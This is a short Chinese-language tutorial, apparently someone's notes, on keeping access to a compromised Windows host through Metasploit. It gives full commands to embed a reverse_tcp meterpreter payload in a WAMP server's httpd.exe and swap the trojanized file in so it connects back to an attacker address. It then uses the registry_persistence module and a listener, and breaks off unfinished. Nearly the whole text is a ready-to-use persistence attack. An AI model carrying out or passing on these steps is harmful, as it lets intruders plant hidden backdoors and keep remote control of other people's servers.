一 在守护进行执行文件中注入后门
在获得meterpreter1之后安装后门的步骤
# 查看系统中有哪些进程,查看在哪些守护进程中安装后门
# 这里使用的服务器是wamp
ps -S httpd.exe
# 停止http服务进程
pkill httpd.exe
# 寻找改进程执行文件的位置
search -f httpd.exe -d C:\
# 下载该服务的执行文件
download C:\\httpd.exe
# 然后将meterpreter1放入后台
background
在服务器执行文件上安装后门
# 从meterpreter1返回到msfconsole
# 在服务执行文件上安装后门,默认端口4444
use payload/windows/x64/metepreter/reverse_tcp #后门上安装的shell
set lhost 192.168.10.115
generate -a x64 -p Windows -x httpd.exe -k -t exe -f http_backdoor.exe
后门制作结束
generate
-a 处理器架构
-p 操作系统平台
-x 后台使用的模板
-t 文件格式
-f 生成的后门文件
准备接受后台反弹的shell
use exploit/mulit/handler
set payload payload/windows/x64/metepreter/reverse_tcp # payload需要与后门上安装的相同
set lhost 192.168.10.115 #后门的shell只会发往115
exploit -j # -j 允许在后台持续监听
进入meterpreter1安装后门
# 切换到服务执行文件所在的目录
cd C:\
# 将原始的服务执行文件备份
mv httpd.exe httpd-backup.exe
# 上传制作的后门文件
upload http_backdoor.exe
# 将后门文件更改为原先的名字
mv http_backdoor.exe httpd.exe
# 切换到目标机器的system sheel
shell
# 这个httpd是wampapache服务器的,停止wampapache,在开启wampapache
net stop wampapache
net start wampapache #会直接启动httpd.exe
# 执行之后,系统就接受到了
二 在注册表中安装后门
# 前提要有一个meterpreter,这个meterpreter放入后天,假设session值为1
use exploit/windows/local/registry_persistence
set session 1 #目的是当前需要一个shell能够操作目标机器的注册表
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.115
exploit
# 需要在攻击机上监听可能返回的shell
use exploit/muilt/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.115
run -j #进入后台监听
还有几个